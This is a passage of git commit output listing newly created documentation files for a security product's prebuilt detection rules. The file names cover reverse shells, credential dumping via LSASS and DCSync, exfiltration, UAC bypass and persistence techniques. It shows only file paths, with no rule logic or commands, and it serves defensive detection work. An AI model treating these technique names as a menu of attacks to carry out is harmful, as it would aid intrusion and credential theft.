docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-microsoft-office-addins.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-powershell-profile.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-telemetrycontroller-scheduled-task-hijack.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-update-orchestrator-service-hijack.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-wmi-event-subscription.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-port-forwarding-rule-addition.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-possible-fin7-dga-command-and-control-behavior.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-code-execution-via-postgresql.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-dcsync.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-lsass-memory-dump.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-renamed-com-services-dll.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-trusted-developer-utility.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-windows-utilities.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-curl-cve-2023-38545-exploitation.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-iso-code.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-region.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-defense-evasion-via-proot.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dga-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-disabling-of-apparmor.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-disabling-of-selinux.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dns-tunneling-via-nslookup.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-external-linux-ssh-brute-force-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-file-transfer-via-certreq.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-hidden-process-via-mount-hidepid.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-internal-linux-ssh-brute-force-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-lateral-tool-transfer-via-smb-share.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-backdoor-user-account-creation.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-proc-filesystem.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-unshadow.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-hack-tool-launched.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-local-account-brute-force-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-ransomware-note-creation-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-tunneling-and-or-port-forwarding.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-local-ntlm-relay-via-http.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-masquerading-as-communication-apps.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-meterpreter-reverse-shell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-scan-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-scan-executed-from-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-sweep-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-non-standard-port-ssh-connection.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-openssh-backdoor-logging-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-init-d-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-motd-file-creation-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-run-control-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-via-time-provider-modification.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-port-monitor-or-print-processor-registration-abuse.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-through-writable-docker-socket.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-container-misconfiguration.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-cve-2023-4911.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-installerfiletakeover.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-overlayfs.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-pkexec.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-python-cap-setuid.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-recently-compiled-executable.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-uid-int-max-bug-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privileged-escalation-via-samaccountname-spoofing.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-process-injection-via-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-client.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-server.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-earthworm.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-pspy-process-monitoring-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-code-execution-via-web-server.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-desktop-shadowing-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-desktop-tunneling-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-activity-via-terminal.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-background-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-java.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-binary.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-child-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-udp.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-secure-file-deletion-via-sdelete-utility.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-shadow-file-read-via-command-line-utilities.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-shell-via-wildcard-injection-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-ssh-it-ssh-worm-downloaded.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-linux-ftp-brute-force-attack-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-linux-rdp-brute-force-attack-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-ssh-brute-force-attack.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-hijacking-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-privilege-escalation-via-cve-2019-14287.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-token-manipulation-via-process-injection.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-suspicious-debugfs-root-device-access.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-syn-based-network-scan-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-unauthorized-access-via-wildcard-injection-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-upgrade-of-non-interactive-shell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-windows-error-manager-masquerading.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-keylogging-script.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-script-block-logging-disabled.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-share-enumeration-script.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-suspicious-discovery-related-windows-api-functions.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-suspicious-script-with-audio-capture-capabilities.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-injection-by-the-microsoft-build-engine.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-started-from-process-id-pid-file.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-termination-followed-by-deletion.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-psexec-network-connection.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-rdp-enabled-via-registry.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-registry-persistence-via-appcert-dll.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-registry-persistence-via-appinit-dll.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-remote-execution-via-file-shares.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-remote-file-download-via-script-interpreter.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-task-created-by-a-windows-script.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-task-execution-at-scale-via-gpo.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-tasks-at-command-enabled.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-security-software-discovery-via-grep.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sensitive-files-compression.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-service-control-spawned-via-script-interpreter.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-setcap-setuid-setgid-capability-set.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-shared-object-created-or-changed-by-previously-unknown-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-solarwinds-process-disabling-services-via-registry.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device-via-airdrop.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-ssh-authorized-keys-file-modification.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-startup-folder-persistence-via-unsigned-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sudo-command-enumeration-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sudoers-file-modification.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suid-sguid-enumeration-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-cmd-execution-via-wmi.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-content-extracted-or-decompressed-via-funzip.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-data-encryption-via-openssl-utility.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-dll-loaded-for-persistence-or-privilege-escalation.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-endpoint-security-parent-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-execution-from-a-mounted-device.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-execution-via-scheduled-task.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-explorer-child-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-file-changes-activity-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-file-creation-in-etc-for-persistence.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-image-load-taskschd-dll-from-ms-office.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-imagepath-service-creation.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-java-child-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-managed-code-hosting-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-mining-process-creation-event.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-ms-office-child-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-ms-outlook-child-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-net-code-compilation.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-net-reflection-via-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-network-activity-to-the-internet-by-previously-unknown-executable.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-pdf-reader-child-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-portable-executable-encoded-in-powershell-script.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-access-via-direct-system-call.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-execution-via-renamed-psexec-executable.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-spawned-from-motd-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-rdp-activex-client-loaded.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-remote-registry-access-via-sebackupprivilege.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-files.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-index-html-file.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-script-object-execution.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-startup-shell-folder-modification.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-symbolic-link-created.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-system-commands-executed-by-previously-unknown-executable.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-termination-of-esxi-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-utility-launched-via-proxychains.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-werfault-child-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-parent-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-wmic-xsl-script-execution.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-zoom-child-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-symbolic-link-to-shadow-copy-created.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-binary-copied-and-or-moved-to-suspicious-directory.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-log-file-deletion.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-shells-via-services.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-temporarily-scheduled-task-creation.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-third-party-backup-files-deleted-via-unexpected-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-privileged-ifileoperation-com-interface.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-windows-directory-masquerading.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-diskcleanup-scheduled-task-hijack.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-icmluautil-elevated-com-interface.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-windows-firewall-snap-in-hijack.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unsigned-dll-loaded-by-svchost.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unsigned-dll-side-loading-from-a-suspicious-folder.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-untrusted-driver-loaded.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-child-process-of-dns-exe.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-executable-file-creation-by-a-system-critical-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-file-modification-by-dns-exe.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-network-activity-from-a-windows-system-binary.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-persistence-via-services-registry.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-parent-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-writing-data-to-an-external-device.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-service-host-child-process-childless-service.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-user-privilege-enumeration-via-id.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-virtual-machine-fingerprinting.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-wmic.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-web-shell-detection-script-process-child-of-common-web-processes.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-defender-disabled-via-registry-modification.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-firewall-disabled-via-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-script-executing-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-script-interpreter-executing-process-via-wmi.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-wmi-incoming-lateral-movement.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rules-8-10-5-appendix.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rules-8-10-5-summary.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/archive-file-with-unusual-extension.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/delayed-execution-via-ping.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc create mode 100644 